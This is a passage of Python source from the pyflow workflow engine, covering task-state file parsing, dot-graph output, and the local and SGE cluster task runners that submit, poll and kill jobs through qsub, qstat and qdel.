        self.sec = self.startSec
        self.isMax = False

    def reset(self) :
        self.sec = self.startSec

    def wait(self) :
        """
        Wait for the current interval (or event), then grow the interval
        by 'factor' up to 'maxSec'.
        """
        if self.event is None :
            time.sleep(self.sec)
        else :
            self.event.wait(self.sec)
        if self.isMax : return
        self.sec = min(self.sec * self.factor, self.maxSec)
        self.isMax = (self.sec == self.maxSec)
        assert self.sec <= self.maxSec


def lockMethod(f):
    """
    method decorator acquires/releases object's lock
    """

    def wrapped(self, *args, **kw):
        # lazily create the lock on first locked-method call:
        if not hasattr(self,"lock") :
            self.lock = threading.RLock()

        self.lock.acquire()
        try:
            return f(self, *args, **kw)
        finally:
            self.lock.release()
    return wrapped


class Bunch:
    """
    generic struct with named argument constructor
    """
    def __init__(self, **kwds):
        self.__dict__.update(kwds)


def stackDump(dumpfp):
    """
    Write a stack dump of all live threads to the given file object.

    adapted from haridsv @ stackoverflow:
    """
    athreads = threading.enumerate()
    tnames = [(th.name) for th in athreads]

    frames = None
    try:
        frames = sys._current_frames()
    except AttributeError:
        # python version < 2.5
        pass

    id2name = {}
    try:
        id2name = dict([(th.ident, th.name) for th in athreads])
    except AttributeError :
        # python version < 2.6
        pass

    # if no frame info is available, or the thread count is unreasonably
    # large, fall back to a name-only summary:
    if (frames is None) or (len(tnames) > 50) :
        dumpfp.write("ActiveThreadCount: %i\n" % (len(tnames)))
        dumpfp.write("KnownActiveThreadNames:\n")
        for name in tnames : dumpfp.write(" %s\n" % (name))
        dumpfp.write("\n")
        return

    dumpfp.write("ActiveThreadCount: %i\n" % (len(frames)))
    dumpfp.write("KnownActiveThreadNames:\n")
    for name in tnames : dumpfp.write(" %s\n" % (name))
    dumpfp.write("\n")

    for tid, stack in list(frames.items()):
        dumpfp.write("Thread: %d %s\n" % (tid, id2name.get(tid, "NAME_UNKNOWN")))
        for filename, lineno, name, line in traceback.extract_stack(stack):
            dumpfp.write('File: "%s", line %d, in %s\n' % (filename, lineno, name))
            if line is not None:
                dumpfp.write("  %s\n" % (line.strip()))
        dumpfp.write("\n")
    dumpfp.write("\n")
####################################################################### # # these functions are written out to a utility script which allows users # to make a dot graph from their current state directory output. We # keep it in pyflow as working code so that pyflow can call sections of it. # def taskStateHeader() : return "#taskLabel\ttaskNamespace\trunState\terrorCode\trunStateUpdateTime\n" def taskStateParser(stateFile) : class Constants : nStateCols = 5 for line in open(stateFile) : if len(line) and line[0] == "#" : continue line = line.strip() w = line.split("\t") if len(w) != Constants.nStateCols : raise Exception("Unexpected format in taskStateFile: '%s' line: '%s'" % (stateFile, line)) yield [x.strip() for x in w] def taskInfoHeader() : return "#%s\n" % ("\t".join(("taskLabel", "taskNamespace", "taskType", "nCores", "memMb", "priority", "isForceLocal", "dependencies", "cwd", "command"))) def taskInfoParser(infoFile) : class Constants : nInfoCols = 10 for line in open(infoFile) : if len(line) and line[0] == "#" : continue line = line.lstrip() w = line.split("\t", (Constants.nInfoCols - 1)) if len(w) != Constants.nInfoCols : raise Exception("Unexpected format in taskInfoFile: '%s' line: '%s'" % (infoFile, line)) yield [x.strip() for x in w] def getTaskInfoDepSet(s) : # reconstruct dependencies allowing for extraneous whitespace in the file: s = s.strip() if s == "" : return [] return set([d.strip() for d in s.split(",")]) class TaskNodeConstants(object) : validRunstates = ("complete", "running", "queued", "waiting", "error") class DotConfig(object) : """ A static container of configuration data for dot graph output """ runstateDotColor = {"waiting" : "grey", "running" : "green", "queued" : "yellow", "error" : "red", "complete" : "blue" } runstateDotStyle = {"waiting" : "dashed", "running" : None, "queued" : None, "error" : "bold", "complete" : None } @staticmethod def getRunstateDotAttrib(runstate) : color = DotConfig.runstateDotColor[runstate] style = 
DotConfig.runstateDotStyle[runstate] attrib = "" if color is not None : attrib += " color=%s" % (color) if style is not None : attrib += " style=%s" % (style) return attrib @staticmethod def getTypeDotAttrib(nodeType) : attrib = "" if nodeType == "workflow" : attrib += " shape=rect style=rounded" return attrib @staticmethod def getDotLegend() : string = '{ rank = source; Legend [shape=none, margin=0, label=<\n' string += '<TABLE BORDER="0" CELLBORDER="1" CELLSPACING="0" CELLPADDING="4">\n' string += '<TR><TD COLSPAN="2">Legend</TD></TR>\n' for state in TaskNodeConstants.validRunstates : color = DotConfig.runstateDotColor[state] string += '<TR> <TD>%s</TD> <TD BGCOLOR="%s"></TD> </TR>\n' % (state, color) string += '</TABLE>>];}\n' return string def writeDotGraph(taskInfoFile, taskStateFile, workflowClassName) : """ write out the current graph state in dot format """ addOrder = [] taskInfo = {} headNodes = set() tailNodes = set() # read info file: for (label, namespace, ptype, _nCores, _memMb, _priority, _isForceLocal, depStr, _cwdStr, _command) in taskInfoParser(taskInfoFile) : tid = (namespace, label) addOrder.append(tid) taskInfo[tid] = Bunch(ptype=ptype, parentLabels=getTaskInfoDepSet(depStr)) if len(taskInfo[tid].parentLabels) == 0 : headNodes.add(tid) tailNodes.add(tid) for plabel in taskInfo[tid].parentLabels : ptid = (namespace, plabel) if ptid in tailNodes : tailNodes.remove(ptid) for (label, namespace, runState, _errorCode, _time) in taskStateParser(taskStateFile) : tid = (namespace, label) taskInfo[tid].runState = runState dotFp = sys.stdout dotFp.write("// Task graph from pyflow object '%s'\n" % (workflowClassName)) dotFp.write("// Process command: '%s'\n" % (cmdline())) dotFp.write("// Process working dir: '%s'\n" % (os.getcwd())) dotFp.write("// Graph capture time: %s\n" % (timeStrNow())) dotFp.write("\n") dotFp.write("digraph %s {\n" % (workflowClassName + "Graph")) dotFp.write("\tcompound=true;\nrankdir=LR;\nnode[fontsize=10];\n") labelToSym = {} 
namespaceGraph = {} for (i, (namespace, label)) in enumerate(addOrder) : tid = (namespace, label) if namespace not in namespaceGraph : namespaceGraph[namespace] = "" sym = "n%i" % i labelToSym[tid] = sym attrib1 = DotConfig.getRunstateDotAttrib(taskInfo[tid].runState) attrib2 = DotConfig.getTypeDotAttrib(taskInfo[tid].ptype) namespaceGraph[namespace] += "\t\t%s [label=\"%s\"%s%s];\n" % (sym, label, attrib1, attrib2) for (namespace, label) in addOrder : tid = (namespace, label) sym = labelToSym[tid] for plabel in taskInfo[tid].parentLabels : ptid = (namespace, plabel) namespaceGraph[namespace] += ("\t\t%s -> %s;\n" % (labelToSym[ptid], sym)) for (i, ns) in enumerate(namespaceGraph.keys()) : isNs = ((ns is not None) and (ns != "")) dotFp.write("\tsubgraph cluster_sg%i {\n" % (i)) if isNs : dotFp.write("\t\tlabel = \"%s\";\n" % (ns)) else : dotFp.write("\t\tlabel = \"%s\";\n" % (workflowClassName)) dotFp.write(namespaceGraph[ns]) dotFp.write("\t\tbegin%i [label=\"begin\" shape=diamond];\n" % (i)) dotFp.write("\t\tend%i [label=\"end\" shape=diamond];\n" % (i)) for (namespace, label) in headNodes : if namespace != ns : continue sym = labelToSym[(namespace, label)] dotFp.write("\t\tbegin%i -> %s;\n" % (i, sym)) for (namespace, label) in tailNodes : if namespace != ns : continue sym = labelToSym[(namespace, label)] dotFp.write("\t\t%s -> end%i;\n" % (sym, i)) dotFp.write("\t}\n") if ns in labelToSym : dotFp.write("\t%s -> begin%i [style=dotted];\n" % (labelToSym[ns], i)) # in LR orientation this will make the graph look messy: # dotFp.write("\tend%i -> %s [style=invis];\n" % (i,labelToSym[ns])) dotFp.write(DotConfig.getDotLegend()) dotFp.write("}\n") hardFlush(dotFp) def writeDotScript(taskDotScriptFile, taskInfoFileName, taskStateFileName, workflowClassName) : """ write dot task graph creation script """ import inspect dsfp = os.fdopen(os.open(taskDotScriptFile, os.O_WRONLY | os.O_CREAT, 0o755), 'w') dsfp.write("""#!/usr/bin/env python # # This is a script to create a 
dot graph from pyflow state files. # Usage: $script >| task_graph.dot # # Note that script assumes the default pyflow state files are in the script directory. # # This file was autogenerated by process: '%s' # ...from working directory: '%s' # import datetime,os,sys,time scriptDir=os.path.abspath(os.path.dirname(__file__)) """ % (os.getcwd(), cmdline())) for dobj in (timeStampToTimeStr, timeStrNow, cmdline, Bunch, LogGlobals, hardFlush, TaskNodeConstants, DotConfig, taskStateParser, taskInfoParser, getTaskInfoDepSet, writeDotGraph) : dsfp.write("\n\n") dsfp.write(inspect.getsource(dobj)) dsfp.write(""" if __name__ == '__main__' : writeDotGraph(os.path.join(scriptDir,'%s'),os.path.join(scriptDir,'%s'),'%s') """ % (taskInfoFileName, taskStateFileName, workflowClassName)) ################################################################ # # workflowRunner Helper Classes: # # class Command(object) : """ Commands can be presented as strings or argument lists (or none) """ def __init__(self, cmd, cwd, env=None) : # 1: sanitize/error-check cmd if ((cmd is None) or (cmd == "") or (isIterable(cmd) and len(cmd) == 0)) : self.cmd = None self.type = "none" elif isString(cmd) : self.cmd = Command.cleanStr(cmd) self.type = "str" elif isIterable(cmd) : self.cmd = [] for i, s in enumerate(cmd): if not (isString(s) or isInt(s)): raise Exception("Argument: '%s' from position %i in argument list command is not a string or integer. 
Full command: '%s'" % (str(s), (i + 1), " ".join([str(s) for s in cmd]))) self.cmd.append(Command.cleanStr(s)) self.type = "list" else : raise Exception("Invalid task command: '%s'" % (str(cmd))) # 2: sanitize cwd self.cwd = "" if cwd is not None and cwd != "" : self.cwd = os.path.abspath(cwd) if os.path.exists(self.cwd) and not os.path.isdir(self.cwd) : raise Exception("Cwd argument is not a directory: '%s', provided for command '%s'" % (cwd, str(cmd))) # copy env: self.env = env def __repr__(self) : if self.cmd is None : return "" if self.type == "str" : return self.cmd return " ".join(self.cmd) @staticmethod def cleanStr(s) : if isInt(s) : s = str(s) if "\n" in s : raise Exception("Task command/argument contains newline characters: '%s'" % (s)) return s.strip() class StoppableThread(threading.Thread): """ Thread class with a stop() method. The thread itself has to check regularly for the stopped() condition. Note that this is a very new thread base class for pyflow, and most threads do not (yet) check their stopped status. """ _stopAll = threading.Event() def __init__(self, *args, **kw): threading.Thread.__init__(self, *args, **kw) self._stopper = threading.Event() def stop(self): "thread specific stop method, may be overridden to add async thread-specific kill behavior" self._stopper.set() @staticmethod def stopAll(): "quick global stop signal for threads that happen to poll stopped() very soon after event" StoppableThread._stopAll.set() def stopped(self): return (StoppableThread._stopAll.isSet() or self._stopper.isSet()) def getSGEJobsDefault() : if ((siteConfig.maxSGEJobs is not None) and (siteConfig.maxSGEJobs != "") and (siteConfig.maxSGEJobs != "unlimited")) : return int(siteConfig.maxSGEJobs) return "unlimited" class ModeInfo(object) : """ Stores default values associated with each runmode: local,sge,... 
""" def __init__(self, defaultCores, defaultMemMbPerCore, defaultIsRetry) : self.defaultCores = defaultCores self.defaultMemMbPerCore = defaultMemMbPerCore self.defaultIsRetry = defaultIsRetry class RunMode(object): data = { "local" : ModeInfo(defaultCores=1, defaultMemMbPerCore=siteConfig.defaultHostMemMbPerCore, defaultIsRetry=False), "sge" : ModeInfo(defaultCores=getSGEJobsDefault(), defaultMemMbPerCore="unlimited", defaultIsRetry=True) } class RetryParam(object) : """ parameters pertaining to task retry behavior """ allowed_modes = [ "nonlocal" , "all" ] def __init__(self, run_mode, retry_max, wait, window, retry_mode) : if retry_mode not in self.allowed_modes : raise Exception("Invalid retry mode parameter '%s'. Accepted retry modes are {%s}." \ % (retry_mode, ",".join(self.allowed_modes))) self._retry_max = retry_max self.wait = wait self.window = window self._retry_mode = retry_mode self._run_mode = run_mode self._finalize() self.validate() def _finalize(self) : """ decide whether to turn retry off based on retry and run modes: """ if (self._retry_mode == "nonlocal") and \ (not RunMode.data[self._run_mode].defaultIsRetry) : self.max = 0 else : self.max = int(self._retry_max) def validate(self): """ check that the public parameters are valid """ def nonNegParamCheck(val, valLabel) : if val < 0 : raise Exception("Parameter %s must be non-negative" % valLabel) nonNegParamCheck(self.max, "retryMax") nonNegParamCheck(self.wait, "retryWait") nonNegParamCheck(self.window, "retryWindow") def getTaskCopy(self,retry_max, wait, window, retry_mode): """ return a deepcopy of the class customized for each individual task for any retry parameters which are not None """ taskself = copy.deepcopy(self) if retry_max is not None: taskself._retry_max = retry_max if wait is not None: taskself.wait = wait if window is not None: taskself.window = window if retry_mode is not None : taskself._retry_mode = retry_mode taskself._finalize() taskself.validate() return taskself class 
RunningTaskStatus(object) : """ simple object allowing remote task threads to communicate their status back to the TaskManager """ def __init__(self,isFinishedEvent) : self.isFinishedEvent = isFinishedEvent self.isComplete = threading.Event() self.errorCode = 0 # errorMessage is filled in by sub-workflow # and command-line tasks. # # Sub-workflows use this to convey whether they have # failed (1) because of failures of their own tasks or (2) # because of an exception in the sub-workflow code, in which # case the exception message and stacktrace are provided. # # command tasks use this to report the stderr tail of a failing # task # self.errorMessage = "" # only used by sub-workflows to indicate that all tasks have been specified self.isSpecificationComplete = threading.Event() class BaseTaskRunner(StoppableThread) : """ Each individual command-task or sub workflow task is run on its own thread using a class inherited from BaseTaskRunner """ def __init__(self, runStatus, taskStr, sharedFlowLog, setRunstate) : StoppableThread.__init__(self) self.setDaemon(True) self.taskStr = taskStr self.setName("TaskRunner-Thread-%s" % (taskStr)) self.runStatus = runStatus self._sharedFlowLog = sharedFlowLog self.lock = threading.RLock() # allows taskRunner to update between queued and running status: self._setRunstate = setRunstate # this is moved into the ctor now, so that a race condition that would double-launch a task # is now not possible (however unlikely it was before): self.setInitialRunstate() def run(self) : """ BaseTaskRunner's run() method ensures that we can capture exceptions which might occur in this thread. Do not override this method -- instead define the core logic for the task run operation in '_run()' Note that for sub-workflow tasks we're interpreting raw client python code on this thread, so exceptions are *very likely* here -- this is not a corner case. 
""" retval = 1 retmsg = "" try: (retval, retmsg) = self._run() except WorkflowRunner._AbortWorkflowException : # This indicates an intended workflow interruption. # send a retval of 1 but not an error message pass except: retmsg = getExceptionMsg() self.runStatus.errorCode = retval self.runStatus.errorMessage = retmsg # this indicates that this specific task has finished: self.runStatus.isComplete.set() # this indicates that *any* task has just finished, so # taskmanager can stop polling and immediately sweep self.runStatus.isFinishedEvent.set() return retval def setRunstate(self, *args, **kw) : if self._setRunstate is None : return self._setRunstate(*args, **kw) def setInitialRunstate(self) : self.setRunstate("running") def flowLog(self, msg, logState) : linePrefixOut = "[TaskRunner:%s]" % (self.taskStr) self._sharedFlowLog(msg, linePrefix=linePrefixOut, logState=logState) def infoLog(self, msg) : self.flowLog(msg, logState=LogState.INFO) def warningLog(self, msg) : self.flowLog(msg, logState=LogState.WARNING) def errorLog(self, msg) : self.flowLog(msg, logState=LogState.ERROR) class WorkflowTaskRunner(BaseTaskRunner) : """ Manages a sub-workflow task """ def __init__(self, runStatus, taskStr, workflow, sharedFlowLog, setRunstate) : BaseTaskRunner.__init__(self, runStatus, taskStr, sharedFlowLog, setRunstate) self.workflow = workflow def _run(self) : namespace = self.workflow._getNamespace() nstLabel = namespaceTypeLabel(namespace) self.infoLog("Starting task specification for %s" % (nstLabel)) self.workflow._setRunning(True) self.workflow.workflow() self.workflow._setRunning(False) self.runStatus.isSpecificationComplete.set() self.infoLog("Finished task specification for %s" % (nstLabel)) retval = self.workflow._waitForTasksCore(namespace, isVerbose=False) retmsg = "" return (retval, retmsg) class CommandTaskRunner(BaseTaskRunner) : """ Parent to local and SGE TaskRunner specializations for command tasks """ taskWrapper = os.path.join(moduleDir, 
"pyflowTaskWrapper.py") def __init__(self, runStatus, runid, taskStr, cmd, nCores, memMb, retry, isDryRun, outFile, errFile, tmpDir, schedulerArgList, sharedFlowLog, setRunstate) : """ @param outFile: stdout file @param errFile: stderr file @param tmpDir: location to write files containing output from the task wrapper script (and not the wrapped task) """ BaseTaskRunner.__init__(self, runStatus, taskStr, sharedFlowLog, setRunstate) self.cmd = cmd self.nCores = nCores self.memMb = memMb self.retry = retry self.isDryRun = isDryRun self.outFile = outFile self.errFile = errFile self.tmpDir = tmpDir self.schedulerArgList = schedulerArgList self.runid = runid self.taskStr = taskStr if not os.path.isfile(self.taskWrapper) : raise Exception("Can't find task wrapper script: %s" % self.taskWrapper) def initFileSystemItems(self): import pickle ensureDir(self.tmpDir) self.wrapFile = os.path.join(self.tmpDir, "pyflowTaskWrapper.signal.txt") # setup all the data to be passed to the taskWrapper and put this in argFile: taskInfo = { 'nCores' : self.nCores, 'outFile' : self.outFile, 'errFile' : self.errFile, 'cwd' : self.cmd.cwd, 'env' : self.cmd.env, 'cmd' : self.cmd.cmd, 'isShellCmd' : (self.cmd.type == "str") } argFile = os.path.join(self.tmpDir, "taskWrapperParameters.pickle") pickle.dump(taskInfo, open(argFile, 'wb')) self.wrapperCmd = [self.taskWrapper, self.runid, self.taskStr, argFile] def _run(self) : """ Outer loop of _run() handles task retry behavior: """ # these initialization steps only need to happen once: self.initFileSystemItems() startTime = time.time() retries = 0 retInfo = Bunch(retval=1, taskExitMsg="", isAllowRetry=False) while not self.stopped() : if retries : self.infoLog("Retrying task: '%s'. 
Total prior task failures: %i" % (self.taskStr, retries)) if self.isDryRun : self.infoLog("Dryrunning task: '%s' task arg list: [%s]" % (self.taskStr, ",".join(['"%s"' % (s) for s in self.getFullCmd()]))) retInfo.retval = 0 else : self.runOnce(retInfo) if retInfo.retval == 0 : break if retries >= self.retry.max : break elapsed = (time.time() - startTime) if (self.retry.window > 0) and \ (elapsed >= self.retry.window) : break if self.stopped() : break if not retInfo.isAllowRetry : break retries += 1 self.warningLog("Task: '%s' failed but qualifies for retry. Total task failures (including this one): %i. Task command: '%s'" % (self.taskStr, retries, str(self.cmd))) retInfo = Bunch(retval=1, taskExitMsg="", isAllowRetry=False) time.sleep(self.retry.wait) return (retInfo.retval, retInfo.taskExitMsg) def getExitMsg(self) : """ Attempt to extract exit message from a failed command task, do not complain in case of any errors in task signal file for this case. """ msgSize = None wrapFp = open(self.wrapFile) for line in wrapFp: w = line.strip().split() if (len(w) < 6) or (w[4] != "[wrapperSignal]") : break if w[5] == "taskStderrTail" : if (len(w) == 7) : msgSize = int(w[6]) break taskExitMsg = "" if msgSize is not None : i = 0 for line in wrapFp: if i >= msgSize : break taskExitMsg += line i += 1 wrapFp.close() return taskExitMsg def getWrapFileResult(self) : """ When the task is theoretically done, go and read the task wrapper to see the actual task exit code. This is required because: 1) On SGE or similar: We have no other way to get the exit code 2) On all systems, we can distinguish between a conventional task error and other problems, such as (a) linux OOM killer (b) exception in the task wrapper itself (c) filesystem failures. """ def checkWrapFileExit(result) : """ return isError=True on error in file format only, missing or incomplete file is not considered an error and the function should not return an error for this case. 
""" if not os.path.isfile(self.wrapFile) : return for line in open(self.wrapFile) : # an incomplete line indicates that the file is still being written: if len(line) == 0 or line[-1] != '\n' : return w = line.strip().split() if len(w) < 6 : result.isError = True return if (w[4] != "[wrapperSignal]") : result.isError = True return if w[5] == "taskExitCode" : if (len(w) == 7) : result.taskExitCode = int(w[6]) return retryCount = 8 retryDelaySec = 30 wrapResult = Bunch(taskExitCode=None, isError=False) totalDelaySec = 0 for trialIndex in range(retryCount) : # if the problem occurs at 0 seconds don't bother with a warning, but # if we've gone through a full retry cycle, then the filesystem delay is # getting unusual and should be a warning: if trialIndex > 1 : msg = "No complete signal file found after %i seconds, retrying after delay. Signal file path: '%s'" % (totalDelaySec,self.wrapFile) self.flowLog(msg, logState=LogState.WARNING) if trialIndex != 0 : time.sleep(retryDelaySec) totalDelaySec += retryDelaySec checkWrapFileExit(wrapResult) if wrapResult.isError : break if wrapResult.taskExitCode is not None : break return wrapResult def getWrapperErrorMsg(self) : if os.path.isfile(self.wrapFile) : stderrList = open(self.wrapFile).readlines() taskExitMsg = ["Anomalous task wrapper stderr output. Wrapper signal file: '%s'" % (self.wrapFile), "Logging %i line(s) of task wrapper log output below:" % (len(stderrList))] linePrefix = "[taskWrapper-stderr]" taskExitMsg.extend([linePrefix + " " + line for line in stderrList]) else : taskExitMsg = ["Anomalous task wrapper condition: Wrapper signal file is missing: '%s'" % (self.wrapFile)] return taskExitMsg class LocalTaskRunner(CommandTaskRunner) : def getFullCmd(self) : return [sys.executable] + self.wrapperCmd def runOnce(self, retInfo) : # sys.stderr.write("starting subprocess call. 
task '%s' cmd '%s'" % (self.taskStr,self.cmd)) # sys.stderr.write("full cmd: "+" ".join(self.getFullCmd()) + "\n") wrapFp = open(self.wrapFile, "w") proc = subprocess.Popen(self.getFullCmd(), stdout=wrapFp, stderr=subprocess.STDOUT, shell=False, bufsize=1) self.infoLog("Task initiated on local node") retInfo.retval = proc.wait() wrapFp.close() wrapResult = self.getWrapFileResult() if (wrapResult.taskExitCode is None) or (wrapResult.taskExitCode != retInfo.retval): retInfo.taskExitMsg = self.getWrapperErrorMsg() retInfo.retval = 1 return retInfo elif retInfo.retval != 0 : retInfo.taskExitMsg = self.getExitMsg() retInfo.isAllowRetry = True # success! (taskWrapper, but maybe not for the task...) return retInfo class QCaller(threading.Thread) : """ Calls to both qsub and qstat go through this run() method so that we can time them out: """ def __init__(self, cmd, infoLog) : threading.Thread.__init__(self) self.setDaemon(True) self.setName("QCaller-Timeout-Thread") self.lock = threading.RLock() self.cmd = cmd self.infoLog = infoLog self.results = Bunch(isComplete=False, retval=1, outList=[]) self.proc = None self.is_kill_attempt = False def run(self) : # Note: Moved Popen() call outside of the mutex and # stopped using proc.communicate() here after # observing python interpreter bug: # http://bugs.python.org/issue13817 # # The interpreter deadlock for this issue has been # observed to block the Popen() call below when using # python 2.7.2: # # Oct 2014 - also wrapped this call with a semaphore because # of the high memory usage associated with each qsub/qstat # subprocess. This was causing pyflow jobs to become unstable # as they would spontaneously exceed the maximum allowed master # process memory. 
        #
        GlobalSync.subprocessControl.acquire()
        try :
            tmp_proc = subprocess.Popen(self.cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=False)
            self.lock.acquire()
            try:
                self.proc = tmp_proc
                # handle the case where Popen was taking its good sweet time and a killProc() was sent in the meantime:
                if self.is_kill_attempt: self.killProc()
            finally:
                self.lock.release()

            if self.is_kill_attempt: return

            for line in self.proc.stdout :
                self.results.outList.append(line)
            self.results.retval = self.proc.wait()
        finally:
            GlobalSync.subprocessControl.release()
        self.results.isComplete = True

    @lockMethod
    def killProc(self) :
        # Best-effort termination of the qsub/qstat subprocess (used when the
        # command has exceeded its timeout).
        import signal

        self.is_kill_attempt = True

        if self.proc is None : return

        try:
            os.kill(self.proc.pid , signal.SIGTERM)
            self.infoLog("Sent SIGTERM to sge command process id: %i" % (self.proc.pid))
        except OSError :
            # process ended before we could kill it (hopefully rare, but possible race condition artifact)
            pass



class SGETaskRunner(CommandTaskRunner) :
    """
    Command-task runner that submits the task wrapper to an SGE cluster
    via qsub, then polls qstat until completion.
    """

    def getFullCmd(self):
        # qsub options:
        #
        qsubCmd = ["qsub",
                   "-V",                  # import environment variables from shell
                   "-cwd",                # use current working directory
                   "-S", sys.executable,  # The taskwrapper script is python
                   "-o", self.wrapFile,
                   "-e", self.wrapFile]
        qsubCmd.extend(self.schedulerArgList)
        qsubCmd.extend(siteConfig.qsubResourceArg(self.nCores, self.memMb))
        qsubCmd.extend(self.wrapperCmd)
        return tuple(qsubCmd)

    def setInitialRunstate(self) :
        # SGE tasks start out queued rather than running:
        self.setRunstate("queued")

    @lockMethod
    def setNewJobId(self, jobId) :
        """
        if stopped here, this is the case where a ctrl-c was entered while the qsub
        command was being submitted, so we must kill the job here:
        """
        self.jobId = jobId
        if self.stopped(): self._killJob()

    def runOnce(self, retInfo) :

        def qcallWithTimeouts(cmd, maxQcallAttempt=1) :
            # run an sge command through QCaller so it can be timed out and
            # retried; returns the Bunch of results from the last attempt.
            maxQcallWait = 180
            qcall = None
            for i in range(maxQcallAttempt) :
                qcall = QCaller(cmd,self.infoLog)
                qcall.start()
                qcall.join(maxQcallWait)
                if not qcall.is_alive() : break
                self.infoLog("Trial %i of sge command has timed out. Killing process for cmd '%s'" % ((i + 1), cmd))
                qcall.killProc()
                self.infoLog("Finished attempting to kill sge command")

            return qcall.results

        # 1) call qsub, check for errors and retrieve taskId:
        #
        if os.path.isfile(self.wrapFile): os.remove(self.wrapFile)

        # write extra info, just in case we need it for post-mortem debug:
        qsubFile = os.path.join(os.path.dirname(self.wrapFile), "qsub.args.txt")
        if os.path.isfile(qsubFile): os.remove(qsubFile)
        qsubfp = open(qsubFile, "w")
        for arg in self.getFullCmd() :
            qsubfp.write(arg + "\n")
        qsubfp.close()

        results = qcallWithTimeouts(self.getFullCmd())

        # parse qsub's "Your job NNN ..." acknowledgment line for the job id:
        isQsubError = False
        self.jobId = None
        if len(results.outList) != 1 :
            isQsubError = True
        else :
            w = results.outList[0].decode('utf-8').split()
            if (len(w) > 3) and (w[0] == "Your") and (w[1] == "job") :
                self.setNewJobId(int(w[2]))
            else :
                isQsubError = True

        if not results.isComplete :
            self._killJob()  # just in case...
            retInfo.taskExitMsg = ["Job submission failure -- qsub command timed-out"]
            return retInfo

        if isQsubError or (self.jobId is None):
            retInfo.taskExitMsg = ["Unexpected qsub output. Logging %i line(s) of qsub output below:" % (len(results.outList)) ]
            retInfo.taskExitMsg.extend([ "[qsub-out] " + line.decode('utf-8') for line in results.outList ])
            return retInfo

        if results.retval != 0 :
            retInfo.retval = results.retval
            retInfo.taskExitMsg = ["Job submission failure -- qsub returned exit code: %i" % (retInfo.retval)]
            return retInfo

        # No qsub errors detected and an sge job_number is acquired -- success!
        self.infoLog("Task submitted to sge queue with job_number: %i" % (self.jobId))

        # 2) poll jobId until sge indicates it's not running or queued:
        #
        queueStatus = Bunch(isQueued=True, runStartTimeStamp=None)

        def checkWrapFileRunStart(result) :
            """
            check wrapper file for a line indicating that it has transitioned from queued to
            running state. Allow for NFS delay or incomplete file
            """
            if not os.path.isfile(self.wrapFile) : return
            for line in open(self.wrapFile) :
                w = line.strip().split()
                if (len(w) < 6) or (w[4] != "[wrapperSignal]") :
                    # this could be incomplete flush to the signal file, so
                    # don't treat it as error:
                    return
                if w[5] == "taskStart" :
                    result.runStartTimeStamp = timeStrToTimeStamp(w[0].strip('[]'))
                    result.isQueued = False
                    return

        # exponential polling times -- make small jobs responsive but give sge a break on long runs...
        ewaiter = ExpWaiter(5, 1.7, 60)

        pollCmd = ("/bin/bash", "--noprofile", "-o", "pipefail", "-c", "qstat -j %i | awk '/^error reason/'" % (self.jobId))
        while not self.stopped():
            results = qcallWithTimeouts(pollCmd, 6)
            isQstatError = False
            if results.retval != 0:
                # a "do not exist" response means the job has left the queue,
                # i.e. it has finished (normal completion path):
                if ((len(results.outList) == 2) and
                    (results.outList[0].decode('utf-8').strip() == "Following jobs do not exist:") and
                    (int(results.outList[1].decode('utf-8')) == self.jobId)) :
                    break
                else :
                    isQstatError = True
            else :
                # any output from the 'error reason' filter means the job has
                # entered an sge error state:
                if (len(results.outList) != 0) :
                    isQstatError = True

            if isQstatError :
                if not results.isComplete :
                    retInfo.taskExitMsg = ["The qstat command for sge job_number %i has timed out for all attempted retries" % (self.jobId)]
                    self._killJob()
                else :
                    retInfo.taskExitMsg = ["Unexpected qstat output or task has entered sge error state. Sge job_number: %i" % (self.jobId)]
                    retInfo.taskExitMsg.extend(["Logging %i line(s) of qstat output below:" % (len(results.outList)) ])
                    retInfo.taskExitMsg.extend([ "[qstat-out] " + line.decode('utf-8') for line in results.outList ])
                    # self._killJob() # leave the job there so the user can better diagnose whatever unexpected pattern has occurred
                return retInfo

            # also check to see if job has transitioned from queued to running state:
            if queueStatus.isQueued :
                checkWrapFileRunStart(queueStatus)
                if not queueStatus.isQueued :
                    self.setRunstate("running", queueStatus.runStartTimeStamp)

            ewaiter.wait()

        if self.stopped() :
            # self._killJob() # no need, job should already have been killed at the stop() call...
            return retInfo

        lastJobId = self.jobId

        # if we've correctly communicated with SGE, then its role is done here
        # if a job kill is required for any of the error states above, it needs to be
        # added before this point:
        self.jobId = None

        wrapResult = self.getWrapFileResult()

        if wrapResult.taskExitCode is None :
            retInfo.taskExitMsg = ["Sge job_number: '%s'" % (lastJobId)]
            retInfo.taskExitMsg.extend(self.getWrapperErrorMsg())
            retInfo.retval = 1
            return retInfo
        elif wrapResult.taskExitCode != 0 :
            retInfo.taskExitMsg = self.getExitMsg()

        retInfo.retval = wrapResult.taskExitCode
        retInfo.isAllowRetry = True

        # success! (for sge & taskWrapper, but maybe not for the task...)
        return retInfo

    @lockMethod
    def _killJob(self) :
        """
        (possibly) asynchronous job kill
        """
        # getattr-style access guards against calls before these attributes exist:
        try                  : isKilled = self.isKilled
        except AttributeError: isKilled = False
        if isKilled: return

        try                  : jobId = self.jobId
        except AttributeError: jobId = None
        if jobId is None: return
        killCmd = ["qdel", "%i" % (int(jobId))]
        # don't wait for or check exit code of kill cmd... just give it one try
        # because we want cleanup to go as quickly as possible
        subprocess.Popen(killCmd, shell=False)
        self.isKilled = True

    @lockMethod
    def stop(self) :
        """
        overload thread stop function to provide a
        qdel of any running tasks.
        """
        CommandTaskRunner.stop(self)
        self._killJob()



class TaskFileWriter(StoppableThread) :
    """
    This class runs on a separate thread and is
    responsible for updating the state and info task
    files
    """

    def __init__(self, writeFunc) :
        StoppableThread.__init__(self)
        # parameter copy:
        self.writeFunc = writeFunc
        # thread settings:
        self.setDaemon(True)
        self.setName("TaskFileWriter-Thread")
        # set whenever a write has been requested:
        self.isWrite = threading.Event()

    def run(self) :
        # NOTE(review): isWrite.wait() has no timeout here -- presumably
        # stop() or a write request sets the event to unblock the loop; verify.
        while not self.stopped() :
            self._writeIfSet()
            time.sleep(5)
            self.isWrite.wait()

    def flush(self):
        self._writeIfSet()

    def _writeIfSet(self) :
        if self.isWrite.isSet() :
            self.isWrite.clear()
            self.writeFunc()



class TaskManager(StoppableThread) :
    """
    This class runs on a separate thread from workflowRunner,
    launching jobs based on the current state of the TaskDAG
    """

    def __init__(self, cdata, tdag) :
        """
        @param cdata: data from WorkflowRunner instance which will be
                 constant during the lifetime of the TaskManager,
                 should be safe to lookup w/o locking
        @param tdag: task graph
        """
        StoppableThread.__init__(self)
        # parameter copy:
        self._cdata = cdata
